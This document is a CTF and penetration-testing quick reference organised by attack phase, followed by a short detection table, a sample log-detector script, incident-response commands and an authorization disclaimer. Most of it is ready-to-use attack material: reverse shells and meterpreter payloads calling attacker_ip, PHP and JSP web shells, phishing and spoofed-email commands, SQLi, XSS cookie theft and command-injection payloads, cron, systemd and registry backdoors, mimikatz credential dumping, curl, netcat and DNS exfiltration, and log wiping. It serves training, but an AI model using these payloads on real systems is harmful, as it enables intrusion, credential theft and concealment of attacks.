CTF Quick Reference Guide for Cybersecurity Professionals
Gather information about the target to identify vulnerabilities and potential entry points
# Whois lookup
whois target.com
# DNS enumeration
dig target.com ANY
nslookup target.com
host -a target.com
# Find subdomains
sublist3r -d target.com
amass enum -d target.com
subfinder -d target.com
# Google dorking examples
site:target.com
site:target.com filetype:pdf
site:target.com intitle:"index of"
# Shodan queries
shodan search "hostname:target.com"
shodan host 192.168.1.1
# Certificate transparency logs
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq .
# Host discovery
nmap -sn 192.168.1.0/24
netdiscover -r 192.168.1.0/24
# Port scanning - TCP
nmap -sS -p- target.com # SYN scan all ports
nmap -sV -p 80,443,8080 target.com # Service version detection
nmap -A target.com # Aggressive scan
# Fast comprehensive scan
nmap -sS -sV -O -p- --min-rate=1000 target.com
# Script scanning
nmap --script vuln target.com
nmap --script=http-enum target.com
# Directory/file brute forcing
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ffuf -u http://target.com/FUZZ -w wordlist.txt
# With extensions
gobuster dir -u http://target.com -w wordlist.txt -x php,html,txt,bak
# Web technology identification
whatweb target.com
nikto -h http://target.com
# CMS identification
wpscan --url http://target.com # WordPress
# SMB enumeration
smbclient -L //target.com -N
smbmap -H target.com
enum4linux -a target.com
# User enumeration
crackmapexec smb target.com -u '' -p '' --users
# Null session
rpcclient -U "" target.com
# SSH banner grabbing
nc target.com 22
# SNMP enumeration
snmpwalk -v 2c -c public target.com
onesixtyone -c community.txt target.com
# NFS shares
showmount -e target.com
Create a malicious payload designed to exploit the identified vulnerabilities
# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe -o payload.exe
# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f elf -o payload.elf
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f raw -o payload.php
# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f raw -o payload.py
# Encoded Windows payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 \
-e x86/shikata_ga_nai -i 10 -f exe -o encoded.exe
# PowerShell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f psh -o payload.ps1
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
nc attacker_ip 4444 -e /bin/bash
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker_ip",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
$client = New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback); # encode the command output before writing it (this line was missing)
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
};
$client.Close();
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
%>
Transmit the weaponized payload to the target environment
# Send phishing email with attachment
sendemail -f attacker@evil.com -t victim@target.com \
-u "Important: Account Security Alert" \
-m "Please review the attached document." \
-a malicious.pdf \
-s mail.evil.com:25
# Using swaks
swaks --to victim@target.com \
--from hr@target.com \
--header "Subject: Updated Company Policy" \
--body "Please review the attached policy." \
--attach malicious.docx
# Simple SMTP spoofing
telnet mail.target.com 25
HELO attacker.com
MAIL FROM: ceo@target.com
RCPT TO: victim@target.com
DATA
Subject: Urgent Request
Please download and review: http://evil.com/report.pdf
.
QUIT
# Simple HTTP server
python3 -m http.server 8080
python2 -m SimpleHTTPServer 8080
# PHP built-in server
php -S 0.0.0.0:8080
# WebDAV server
wsgidav --host=0.0.0.0 --port=8080 --root=/path/to/files
<!-- Automatic download -->
<iframe src="http://attacker_ip/payload.exe" style="display:none;"></iframe>
<!-- HTML smuggling -->
<script>
var payload = atob('base64_encoded_payload');
var blob = new Blob([payload], {type: 'application/octet-stream'});
var url = window.URL.createObjectURL(blob);
var a = document.createElement('a');
a.href = url;
a.download = 'document.pdf';
a.click();
</script>
# Create SMB share
impacket-smbserver share /path/to/payloads -smb2support
# Access from Windows
\\attacker_ip\share\payload.exe
# MITM with Responder
responder -I eth0 -Pdv
# Create evil twin AP
airbase-ng -e "Free_WiFi" -c 6 wlan0
# Captive portal with credential harvesting
wifiphisher -aI wlan0 -jI wlan1 -p firmware-upgrade
Execute malicious code to gain initial access by exploiting vulnerabilities
-- Basic SQLi test
' OR '1'='1
' OR '1'='1' --
admin' --
-- Union-based SQLi
' UNION SELECT NULL--
' UNION SELECT username,password FROM users--
-- Time-based blind SQLi
' AND SLEEP(5)-- (MySQL)
'; WAITFOR DELAY '00:00:05'-- (MSSQL)
-- SQLMap automated exploitation
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database --tables
sqlmap -u "http://target.com/page.php?id=1" --os-shell
<!-- Reflected XSS -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<!-- Cookie stealing -->
<script>
new Image().src='http://attacker_ip/steal.php?c='+document.cookie;
</script>
# Basic LFI
http://target.com/page.php?file=../../../../etc/passwd
# PHP wrappers
http://target.com/page.php?file=php://filter/convert.base64-encode/resource=config.php
http://target.com/page.php?file=php://input # POST: <?php system($_GET['cmd']); ?>
# Log poisoning
http://target.com/page.php?file=../../../../var/log/apache2/access.log&cmd=whoami
# Basic command injection
; whoami
| whoami
&& whoami
` whoami `
$(whoami)
# Reverse shell via command injection
; bash -i >& /dev/tcp/attacker_ip/4444 0>&1
; nc attacker_ip 4444 -e /bin/bash
# EternalBlue (MS17-010)
use exploit/windows/smb/ms17_010_eternalblue
set RHOST target.com
set LHOST attacker_ip
exploit
# Pass-the-hash
pth-winexe -U administrator%hash //target.com cmd
crackmapexec smb target.com -u admin -H ntlm_hash
# RDP brute force
hydra -l administrator -P passwords.txt rdp://target.com
# SSH brute force
hydra -l root -P rockyou.txt ssh://target.com
# Kernel exploits
searchsploit linux kernel 4.4.0
./dirtycow /etc/passwd
# SUID exploitation
find / -perm -4000 2>/dev/null
./suid_binary
Establish persistence on the compromised system
# User crontab
(crontab -l; echo "*/5 * * * * /tmp/.hidden.sh") | crontab -
# System-wide cron
echo "*/10 * * * * root /tmp/.backdoor.sh" >> /etc/crontab
# Create malicious service
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=System Update Service
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor.service
# Add SSH public key
mkdir -p /root/.ssh
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# Current User
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
# All Users
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
# Create scheduled task
schtasks /create /tn "Windows Update" /tr "C:\Windows\Temp\backdoor.exe" /sc onlogon /ru System
# PowerShell
$action = New-ScheduledTaskAction -Execute "C:\backdoor.exe"
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName "Backdoor" -Action $action -Trigger $trigger
# Create Windows service
sc create "Update Service" binPath= "C:\backdoor.exe" start= auto
sc start "Update Service"
<?php
// Simple backdoor
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
// Hidden backdoor with password
if(md5($_GET['pass']) == "5f4dcc3b5aa765d61d8327deb882cf99") {
eval($_POST['cmd']);
}
?>
weevely generate password backdoor.php
weevely http://target.com/backdoor.php password
Establish a remote communication channel for control
# Start msfconsole
msfconsole
# Set up listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit -j # Run as background job
# System information
sysinfo
getuid
ps
# Privilege escalation
getsystem
run post/windows/gather/smart_hashdump
# Screenshot & Keylogging
screenshot
keyscan_start
keyscan_dump
# File operations
download C:\\important.txt
upload /tmp/backdoor.exe C:\\Windows\\Temp\\
# Network
ipconfig
route
portfwd add -l 3389 -p 3389 -r 127.0.0.1
# Persistence
run persistence -X -i 60 -p 4444 -r attacker_ip
# Shell
shell
# Listener
nc -lvnp 4444
# Upgrade shell to TTY
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Full TTY upgrade
# On victim:
python -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z
# On attacker:
stty raw -echo; fg
# Press Enter twice
export TERM=xterm
# Local port forward
ssh -L 8080:internal_server:80 user@jump_host
# Remote port forward
ssh -R 8080:localhost:80 user@external_server
# Dynamic port forward (SOCKS proxy)
ssh -D 9050 user@jump_host
proxychains nmap -sT internal_network
# Server (on attacker)
chisel server -p 8000 --reverse
# Client (on victim)
chisel client attacker_ip:8000 R:1080:socks
chisel client attacker_ip:8000 R:8080:localhost:80
# Use SOCKS proxy
proxychains nmap -sT 192.168.1.0/24
# Configure /etc/proxychains.conf
socks5 127.0.0.1 9050
# Use with tools
proxychains nmap -sT target_ip
proxychains firefox
proxychains ssh user@internal_host
Achieve the ultimate goal of the attack (data theft, disruption, etc.)
# Load mimikatz
.\mimikatz.exe
# Dump credentials from memory
sekurlsa::logonpasswords
# Dump NTLM hashes
lsadump::sam
# DCSync attack
lsadump::dcsync /domain:target.com /user:Administrator
# Kerberos tickets
sekurlsa::tickets
# Golden ticket
kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-xxx /krbtgt:[hash]
# Extract SAM and SYSTEM
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# Crack offline
impacket-secretsdump -sam sam.save -system system.save LOCAL
# Copy shadow file
cat /etc/shadow > /tmp/.shadow
# Crack with John
unshadow /etc/passwd /etc/shadow > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Crack with Hashcat
hashcat -m 1800 -a 0 hashes.txt rockyou.txt
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find /home -name "*.pem" 2>/dev/null
# HTTP upload
curl -X POST -F "file=@sensitive.txt" http://attacker_ip/upload
# SCP
scp sensitive.txt user@attacker_ip:/tmp/
# Netcat
# On attacker:
nc -lvnp 4444 > exfil.zip
# On victim:
nc attacker_ip 4444 < sensitive.zip
# Base64 encode and exfiltrate
base64 sensitive.txt | curl -X POST -d @- http://attacker_ip/receive
# Gzip and base64
tar czf - /etc | base64 | curl -X POST -d @- http://attacker_ip/receive
# Manual DNS exfiltration
for line in $(cat secret.txt | base64); do
dig $line.attacker.com
done
# Automated DNS exfiltration
dnscat2 --dns server=attacker_ip,domain=attacker.com
# PsExec
impacket-psexec administrator:password@target.com
PsExec.exe \\target.com -u administrator -p password cmd
# WMI
wmic /node:target.com /user:administrator process call create "cmd.exe"
# WinRM
Enter-PSSession -ComputerName target.com -Credential (Get-Credential)
Invoke-Command -ComputerName target.com -ScriptBlock { whoami }
# Pass-the-hash
impacket-psexec -hashes :ntlm_hash administrator@target.com
# SSH
ssh user@target.com
ssh -i id_rsa user@target.com
# SSH key-based lateral movement
for host in $(cat hosts.txt); do
ssh -i id_rsa user@$host 'command'
done
# Check sudo permissions
sudo -l
# GTFOBins exploitation
sudo /usr/bin/vim -c ':!/bin/bash'
sudo /usr/bin/find . -exec /bin/bash \; -quit
# Kernel exploits
./dirtycow /etc/passwd
# SUID binaries
find / -perm -4000 2>/dev/null
# UAC bypass
use exploit/windows/local/bypassuac
# Token impersonation
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
# AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Clear event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Disable logging
auditpol /set /category:* /success:disable /failure:disable
# Clear bash history
history -c
echo > ~/.bash_history
rm ~/.bash_history
# Clear system logs
echo > /var/log/auth.log
echo > /var/log/syslog
# Clear specific log entries
sed -i '/attacker_ip/d' /var/log/apache2/access.log
Detection and prevention techniques for each phase
| Phase | Detection Method | Tools/Techniques |
|---|---|---|
| Reconnaissance | Monitor for port scans, excessive DNS queries | IDS/IPS, SIEM, rate limiting |
| Weaponization | Antivirus, YARA rules | EDR, VirusTotal, sandboxing |
| Delivery | Email security, spam filtering | SEG, SPF/DKIM/DMARC |
| Exploitation | WAF, IDS signatures | ModSecurity, Snort, Suricata |
| Installation | File integrity monitoring | AIDE, Tripwire, Sysmon |
| Command & Control | Network traffic analysis | Zeek, Wireshark, JA3 fingerprinting |
| Actions | DLP, UBA, anomaly detection | SIEM correlation, behavior analytics |
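The table names a detection method per phase but not the logic behind it. The script below is an added example, not part of the original guide: it runs three minimal detectors over constructed sample logs that mirror techniques shown earlier on this page. A distinct-destination-port count per source covers the port scans under Reconnaissance, request signatures (directory traversal, `php://` wrappers, quote-and-comment SQLi, shell metacharacters) cover the Exploitation payloads, and a long base64-alphabet-label heuristic covers the DNS exfiltration loop under Actions. The log formats, IP addresses, domain names, thresholds and function names are all assumptions made for the example.

```python
"""Added example (not part of the guide): three minimal detectors run over constructed log lines."""
import re
from collections import defaultdict
from urllib.parse import unquote

# Reconnaissance: constructed netfilter-style log lines; 10.0.0.5 probes many ports, 10.0.0.9 does not.
FW_LOG = """\
SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP DPT=21 SYN
SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP DPT=22 SYN
SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP DPT=23 SYN
SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP DPT=25 SYN
SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP DPT=80 SYN
SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP DPT=110 SYN
SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP DPT=143 SYN
SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP DPT=443 SYN
SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP DPT=443 SYN
"""
FW_RE = re.compile(r"SRC=(\S+) .*?DPT=(\d+)")


def detect_port_scans(text, min_ports=8):
    """Map each source IP to its sorted distinct destination ports; keep sources at or above min_ports."""
    ports = defaultdict(set)
    for line in text.splitlines():
        m = FW_RE.search(line)
        if m:
            ports[m.group(1)].add(int(m.group(2)))
    return {src: sorted(p) for src, p in ports.items() if len(p) >= min_ports}


# Exploitation: constructed Apache access-log lines carrying the LFI, wrapper, SQLi and injection payloads.
ACCESS_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /page.php?file=../../../../etc/passwd HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?file=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /login.php?user=admin'%20--&pass=x HTTP/1.1" 302 0
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /ping.php?host=127.0.0.1;whoami HTTP/1.1" 200 64
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 1024
"""
ACCESS_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')
WEB_SIGNATURES = {
    "lfi_traversal": re.compile(r"\.\./"),
    "php_wrapper": re.compile(r"php://(filter|input)", re.I),
    "sqli": re.compile(r"'\s*(or|union|and)\s|'\s*--|waitfor\s+delay|sleep\(", re.I),
    "cmd_injection": re.compile(r"[;|`]|&&|\$\("),
}


def scan_access_log(text):
    """Return (client_ip, rule_name, decoded_request) for every request that matches a signature."""
    hits = []
    for line in text.splitlines():
        m = ACCESS_RE.search(line)
        if not m:
            continue
        ip, path = m.group(1), unquote(m.group(2))  # decode %20 etc. before matching
        for name, pattern in WEB_SIGNATURES.items():
            if pattern.search(path):
                hits.append((ip, name, path))
    return hits


# Actions: constructed resolver log ("client qname"); 10.0.0.5 sends base64 labels to one zone.
DNS_LOG = """\
10.0.0.5 c2VjcmV0IGRhdGEgbGluZSAx.attacker.com
10.0.0.5 c2VjcmV0IGRhdGEgbGluZSAy.attacker.com
10.0.0.5 c2VjcmV0IGRhdGEgbGluZSAz.attacker.com
10.0.0.5 c2VjcmV0IGRhdGEgbGluZSA0.attacker.com
10.0.0.5 c2VjcmV0IGRhdGEgbGluZSA1.attacker.com
10.0.0.5 c2VjcmV0IGRhdGEgbGluZSA2.attacker.com
10.0.0.9 www.example.com
10.0.0.9 cdn-assets-static-01.example.net
10.0.0.9 a1b2c3d4e5f6a7b8c9d0e1f2.example.com
"""
BASE64_LABEL = re.compile(r"^[A-Za-z0-9+/=]{20,}$")  # long label drawn only from the base64 alphabet


def detect_dns_exfil(text, min_queries=5):
    """Return {(client, zone): count} for clients sending >= min_queries distinct base64-looking labels to one zone."""
    by_zone = defaultdict(set)
    for line in text.splitlines():
        client, qname = line.split()
        labels = qname.rstrip(".").split(".")
        if len(labels) >= 3 and BASE64_LABEL.match(labels[0]):
            by_zone[(client, ".".join(labels[-2:]))].add(labels[0])
    return {key: len(seen) for key, seen in by_zone.items() if len(seen) >= min_queries}


if __name__ == "__main__":
    print("port scans:", detect_port_scans(FW_LOG))
    for hit in scan_access_log(ACCESS_LOG):
        print("web:", hit)
    print("dns exfil:", detect_dns_exfil(DNS_LOG))
```

The thresholds are deliberately simple: a single long hash-like label to `example.com` stays below `min_queries`, and one client repeatedly hitting port 443 stays below `min_ports`, so only the sustained patterns the page's commands would produce are flagged. In a real deployment the same three functions would be fed by a SIEM or by `tcpdump`/Zeek output rather than embedded strings.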
# Isolate compromised system (Linux) - run from a local console, since this also cuts the analyst's own remote session; existing ACCEPT rules still apply until flushed
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
# Disable network adapter (Windows)
netsh interface set interface "Ethernet" admin=disable
# Memory dump (modern kernels restrict /dev/mem via CONFIG_STRICT_DEVMEM; use a dedicated acquisition tool such as LiME or avml instead)
dd if=/dev/mem of=memory.dump
# Disk imaging
dc3dd if=/dev/sda of=disk.img hash=md5 hash=sha256
# Network capture
tcpdump -i eth0 -w capture.pcap
# Analyze logs
grep -r "attacker_ip" /var/log/
journalctl -xe | grep suspicious
IMPORTANT: This guide is for educational purposes and authorized penetration testing only.
Misuse of these techniques may result in criminal prosecution, civil liability, loss of certifications, and damage to reputation.
Always get explicit written authorization before testing any system you do not own.
# Linux
/root/flag.txt
/home/*/flag.txt
/var/www/html/flag.txt
# Windows
C:\Users\Administrator\Desktop\flag.txt
C:\flag.txt
# Find flags
find / -name "*flag*" 2>/dev/null
#!/bin/bash
# Usage: ./enum.sh <target>
TARGET=${1:?usage: $0 <target>}
# Port scan (-oA writes nmap_scan.nmap, .gnmap and .xml)
nmap -sS -sV -O -p- -T4 "$TARGET" -oA nmap_scan
# Web enumeration
if grep -q "80/tcp.*open" nmap_scan.nmap; then
gobuster dir -u "http://$TARGET" -w wordlist.txt
fi
# SMB enumeration
if grep -q "445/tcp.*open" nmap_scan.nmap; then
enum4linux -a "$TARGET"
fi